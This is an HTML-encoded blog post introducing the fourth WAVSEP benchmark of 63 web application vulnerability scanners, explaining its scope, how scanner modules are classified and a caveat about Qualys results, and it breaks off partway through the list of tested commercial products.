&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Tools, Features, Results, Statistics and Price Comparison&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(Delete Cache Prior to Viewing)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 208.05pt;&quot; valign=&quot;top&quot; width=&quot;277&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;A Step by Step Guide for Choosing the Right Web
  Application Vulnerability Scanner for *You*&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://www.infosecisland.com/blogview/21926-A-Step-by-Step-Guide-for-Choosing-the-Best-Scanner.html&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;infosec-island&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It is fashionably late, but the time eventually came.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Months and months of research finally came to fruition with
the publication of the yearly &lt;b&gt;WAVSEP&lt;/b&gt; benchmark, the fourth one in the
series.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;It&#39;s been a very exciting year for the project… with many
new things happening.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I&#39;d like to share some of those, as they can put in perspective
how the project is progressing:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I&#39;ve noticed the project was included in many continues
integration processes of various commercial vendors, and lately, even in
similar processes of open source projects (for example – &lt;a href=&quot;https://code.google.com/p/zaproxy/wiki/TestingWavsep&quot;&gt;ZAP&lt;/a&gt;).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The same commercial vendors, as well as colleagues and people
I met in conferences around the world, brought to my attention that various government
institutes and agencies worldwide use the platform as an assessment platform for
vulnerability scanners, often as the main one.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I got contacted by many organizations in the financial and
technology sector that asked me to help them do the same, and found some time
to enhance the platform for that purpose.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I also received source code contributions from multiple
project and individuals, as well as support from volunteers, feedback, and
plenty of inspiration.&amp;nbsp; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I even began receiving phone calls, and on multiple occasions,
from &quot;angels&quot;, relevant companies and investors around the globe, that
wanted to know whether or not to invest in vulnerability detection initiatives
and products.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;With all the support, contribution, and data collected in
this research over the years, I believe that soon a subject that still remained
obscure could finally be determined – &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;A simple process that will enable to evaluate the customized
ROI per product:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The Return of Investment (ROI) from each product in the
category&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;While were definitely not there yet, not in this article
anyway, with each publication, there&#39;s less and less missing pieces, and the
data collected while preparing for this publication closed a significant portion
of the gap.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The assessment covers &lt;b&gt;12&lt;/b&gt; different aspects of the
tools (or 16, if you consider non competitive charts), including &lt;b&gt;two new
attack vectors they were not assessed in the past&lt;/b&gt; (!), and this time, they were
all assigned with recommended priorities that readers can use for evaluation.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The research also managed to finally &lt;b&gt;breach&lt;/b&gt; the
traditional &lt;b&gt;level 60 cap&lt;/b&gt; (the best metaphor a gamer could come up with
at 5AM) and add three additional products to the assessment, to a total of &lt;b&gt;63
different web application vulnerability scanners&lt;/b&gt;, including some that were
never assessed in the past, and with potential to add more in the near future.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;These include a total of &lt;b&gt;14&lt;/b&gt; &lt;b&gt;commercial products&lt;/b&gt;
and &lt;b&gt;SAAS services&lt;/b&gt;, as well as &lt;b&gt;49 free&lt;/b&gt; and/or &lt;b&gt;opensource&lt;/b&gt;
projects.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Following its tradition, the research focused on the main module
which is usually associated with term &quot;web application vulnerability
scanner&quot;, and this time, it is in our interest to define this module
properly, as well as the difference between it and other modules that may be
associated to the same title.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although the term &quot;web application scanner&quot; meant
different things over the years, I believe that dividing its various
functionalities into modules, can help understand the focus of this research,
as well as properly classify and evaluate the contribution of the various modules
in the future.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Since I didn&#39;t find any dominant classification, I am going
to use a descriptive one for the purpose of this research.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Black-Box web application scanners may contain any of the
following modules:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;Generic Application-Level Vulnerability Detection
Module&lt;/b&gt;: a collection of features that attempt to identify generic exposures
in the application layer, without prior knowledge about the application and its
structure, and while potentially overcoming barriers along the way. &lt;b&gt;This
module is the primary focus of this research&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;Known&lt;/b&gt; &lt;b&gt;Application-Level / Web Server Vulnerability
Detection Module&lt;/b&gt;: Commonly classified as a CGI scanner (a bit old school
for my taste), or a web server scanner, but often using the same classification
as the above module – the collection of features that falls under that category
attempts to identify vulnerabilities that are known (and/or were published) in
a shelf product. This module is &lt;b&gt;NOT&lt;/b&gt; covered by this research&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Additional modules may include &quot;Generic Vulnerability
Exploitation Module&quot;, &quot;Known Vulnerability Exploitation Module&quot;,
a &quot;web site infection&quot; detection module, and others. These too, are
not covered by this research, and although many of the tested projects/products
contain a couple of types, they are also often implemented in separate products.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;So now that were done clarifying and classifying, as always,
one last tip: &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;A lot of the information gathered in this research cannot be
presented in graphs, so if you&#39;re seeking for the &lt;b&gt;more significant content&lt;/b&gt;,
you&#39;ll have dig in past the charts and graphs. If you&#39;re reading 3 graphs and
can already declare a winner, you&#39;re missing some good stuff along the way.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Try the sections in the main menu with all the fancy words beside
them… they usually do the trick. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;b&gt;Update&lt;/b&gt;&lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;:&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
During the assessment of&amp;nbsp;&lt;b&gt;Qualys&amp;nbsp;&lt;/b&gt;it is highly likely that an optimization mechanism&amp;nbsp;&lt;b&gt;affected&amp;nbsp;&lt;/b&gt;the&amp;nbsp;&lt;b&gt;scan results&amp;nbsp;&lt;/b&gt;of&amp;nbsp;&lt;b&gt;POST&amp;nbsp;test&amp;nbsp;cases&amp;nbsp;&lt;/b&gt;&lt;b&gt;(compared to WAVSEP 2012 results)&lt;/b&gt;. Although in the case of other vendors disabling similar mechanisms solved the problem, in the case of Qualys this optimization mechanism could not be disabled via the configuration interface. We are currently trying to find solutions to the problem.&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;2. List of Tested Web Application Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The following &lt;b&gt;commercial&lt;/b&gt; scanners were &lt;b&gt;covered&lt;/b&gt;
in the benchmark:&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/web-application-scanners/65.html&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Acunetix WVS&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v9.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;build 20140113 &lt;b&gt;(Acunetix)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-left: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;NTOSpider&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v6.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: center; unicode-bidi: embed;&quot;&gt;
